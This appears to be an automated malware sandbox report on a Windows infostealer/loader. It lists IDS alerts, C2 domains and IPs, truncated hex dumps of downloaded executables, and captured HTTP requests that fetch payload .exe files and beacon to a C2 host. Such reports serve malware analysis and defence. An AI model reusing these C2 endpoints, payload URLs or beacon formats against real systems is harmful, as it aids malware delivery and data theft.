Snort IDS: 2034813 ET TROJAN Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern 192.168.2.3:49870 -> 65.108.180.72:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: bitly.com
Source: C:\Windows\explorer.exe	Domain query: cdn.discordapp.com
Source: C:\Windows\explorer.exe	Domain query: unicupload.top
Source: C:\Windows\explorer.exe	Domain query: srtuiyhuali.at
Source: C:\Windows\explorer.exe	Network Connect: 185.233.81.115 187	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: fufuiloirtu.com
Source: C:\Windows\explorer.exe	Domain query: amogohuigotuli.at
Source: C:\Windows\explorer.exe	Domain query: host-data-coin-11.com
Source: C:\Windows\explorer.exe	Domain query: bit.ly
Source: C:\Windows\explorer.exe	Network Connect: 185.186.142.166 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: privacytools-foryou-777.com
Source: C:\Windows\explorer.exe	Domain query: data-host-coin-8.com
Source: C:\Windows\explorer.exe	Domain query: unic11m.top

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: pa:443
Source: Malware configuration extractor	URLs: parubey.info:443
Source: Malware configuration extractor	URLs: http://host-data-coin-11.com/
Source: Malware configuration extractor	URLs: http://file-coin-host-12.com/
Source: Malware configuration extractor	URLs: http://file-file-host4.com/tratata.php

Source: Joe Sandbox View	JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Source: Joe Sandbox View	JA3 fingerprint: 8916410db85077a5460817142dcbc8de

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:45 GMTContent-Type: application/x-msdos-programContent-Length: 358912Connection: closeLast-Modified: Mon, 03 Jan 2022 22:00:28 GMTETag: "57a00-5d4b4a60838eb"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6b 91 a1 53 2f f0 cf 00 2f f0 cf 00 2f f0 cf 00 31 a2 5a 00 3d f0 cf 00 31 a2 4c 00 57 f0 cf 00 08 36 b4 00 2a f0 cf 00 2f f0 ce 00 ee f0 cf 00 31 a2 4b 00 10 f0 cf 00 31 a2 5b 00 2e f0 cf 00 31 a2 5e 00 2e f0 cf 00 52 69 63 68 2f f0 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 08 00 74 f1 e5 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 09 00 00 3c 04 00 00 4a 02 00 00 00 00 00 c0 34 02 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 d0 06 00 00 04 00 00 41 c1 05 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 39 04 00 3c 00 00 00 00 30 06 00 f8 59 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 06 00 14 23 00 00 50 13 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 a6 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 e0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 34 3a 04 00 00 10 00 00 00 3c 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 60 9a 01 00 00 50 04 00 00 8c 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 61 6d 69 63 61 6b 05 00 00 00 00 f0 05 00 00 02 00 00 00 cc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 64 6f 73 00 00 00 00 4b 00 00 00 00 00 06 00 00 02 00 00 00 ce 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6d 6f 64 61 76 00 00 ea 00 00 00 00 10 06 00 00 02 00 00 00 d0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 75 67 69 72 6f 66 93 0d 00 00 00 20 06 00 00 0e 00 00 00 d2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 59 00 00 00 30 06 00 00 5a 00 00 00 e0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 a2 3e 00 00 00 90 06 00 00 40 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:47:58 GMTContent-Type: application/x-msdos-programContent-Length: 330752Connection: closeLast-Modified: Sun, 09 Jan 2022 17:47:02 GMTETag: "50c00-5d529cebedc6a"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 66 ce f5 7c 07 a0 a6 7c 07 a0 a6 7c 07 a0 a6 62 55 24 a6 57 07 a0 a6 62 55 35 a6 61 07 a0 a6 62 55 23 a6 fa 07 a0 a6 5b c1 db a6 79 07 a0 a6 7c 07 a1 a6 f7 07 a0 a6 62 55 2a a6 7d 07 a0 a6 62 55 34 a6 7d 07 a0 a6 62 55 31 a6 7d 07 a0 a6 52 69 63 68 7c 07 a0 a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 0d 51 4f 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 c2 77 02 00 00 00 00 af 1e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 78 02 00 04 00 00 80 4d 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 95 03 00 3c 00 00 00 00 60 77 02 d0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 8c 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f9 08 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 7e 02 00 00 20 01 00 00 80 02 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 bb 73 02 00 a0 03 00 00 86 00 00 00 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 f7 00 00 00 60 77 02 00 f8 00 00 00 14 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:42 GMTContent-Type: application/x-msdos-programContent-Length: 296448Connection: closeLast-Modified: Sun, 09 Jan 2022 17:48:01 GMTETag: "48600-5d529d245249e"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 38 66 ce f5 7c 07 a0 a6 7c 07 a0 a6 7c 07 a0 a6 62 55 24 a6 57 07 a0 a6 62 55 35 a6 61 07 a0 a6 62 55 23 a6 fa 07 a0 a6 5b c1 db a6 79 07 a0 a6 7c 07 a1 a6 f7 07 a0 a6 62 55 2a a6 7d 07 a0 a6 62 55 34 a6 7d 07 a0 a6 62 55 31 a6 7d 07 a0 a6 52 69 63 68 7c 07 a0 a6 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 4d 4a 4f 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 0a 01 00 00 3c 77 02 00 00 00 00 af 1e 00 00 00 10 00 00 00 20 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 77 02 00 04 00 00 a1 79 05 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 8c 10 03 00 3c 00 00 00 00 e0 76 02 d0 f7 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 21 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 07 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f9 08 01 00 00 10 00 00 00 0a 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 f9 01 00 00 20 01 00 00 fa 01 00 00 0e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 bb 73 02 00 20 03 00 00 86 00 00 00 08 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 f7 00 00 00 e0 76 02 00 f8 00 00 00 8e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:48 GMTContent-Type: application/x-msdos-programContent-Length: 1670200Connection: closeLast-Modified: Sun, 09 Jan 2022 12:04:31 GMTETag: "197c38-5d52505cea333"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 13 aa cc 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 2e 01 00 00 84 0a 00 00 00 00 00 00 50 3a 00 00 10 00 00 00 40 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 3b 00 00 04 00 00 66 1c 1a 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 40 31 00 60 01 00 00 00 50 31 00 78 f8 08 00 00 00 00 00 00 00 00 00 70 63 19 00 c8 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 41 54 41 00 00 00 00 00 30 31 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 63 74 6f 72 73 00 00 00 10 00 00 00 40 31 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 78 f8 08 00 00 50 31 00 0c ed 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 65 78 74 00 00 00 00 a0 01 00 00 50 3a 00 0d 9e 01 00 00 f4 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Sun, 09 Jan 2022 17:48:58 GMTContent-Type: application/x-msdos-programContent-Length: 590848Connection: closeLast-Modified: Sun, 09 Jan 2022 14:15:02 GMTETag: "90400-5d526d88d6301"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5e 60 89 17 1a 01 e7 44 1a 01 e7 44 1a 01 e7 44 04 53 63 44 33 01 e7 44 04 53 72 44 07 01 e7 44 04 53 64 44 66 01 e7 44 3d c7 9c 44 1f 01 e7 44 1a 01 e6 44 92 01 e7 44 04 53 6d 44 1b 01 e7 44 04 53 73 44 1b 01 e7 44 04 53 76 44 1b 01 e7 44 52 69 63 68 1a 01 e7 44 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 6c 5f 9e 60 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 ec 00 00 00 d4 7b 02 00 00 00 00 9f 1c 00 00 00 10 00 00 00 00 01 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 50 7c 02 00 04 00 00 ab a3 09 00 02 00 00 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 84 07 00 3c 00 00 00 00 50 7b 02 f8 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 7c 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 94 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 09 ea 00 00 00 10 00 00 00 ec 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e2 8d 06 00 00 00 01 00 00 8e 06 00 00 f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 b8 ba 73 02 00 90 07 00 00 86 00 00 00 7e 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 fe 00 00 00 50 7b 02 00 00 01 00 00 04 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0

Source: global traffic	HTTP traffic detected: GET /32739433.dat?iddqd=1 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.233.81.115
Source: global traffic	HTTP traffic detected: GET /attachments/928021103304134716/928938539171864596/Dulling.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.com
Source: global traffic	HTTP traffic detected: GET /3eHgQQR HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bit.ly
Source: global traffic	HTTP traffic detected: GET /a/blocked?hash=3eHgQQR&url=https%3A%2F%2Fcdn-131.anonfiles.com%2FP0m5w4j2xc%2Fcac3eb98-1640853984%2F%40Cryptobat9.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: bitly.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fxrkgvik.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://gajno.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://bmfgfkjf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 365Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://veuiviue.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://dmryaqnk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://mckoice.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://vvsuujdwht.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xmpxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /files/2184_1641247228_8717.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xjbxvifs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 220Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://pynrhmvhj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qlrgaved.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xhqofq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://xjnbybe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://qbhyoygecf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://deiypnos.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 151Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ccuaitw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 117Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://fxnaip.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
Source: global traffic	HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: /Referer: http://ghsrebmie.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 226Host: host-data-coin-11.com
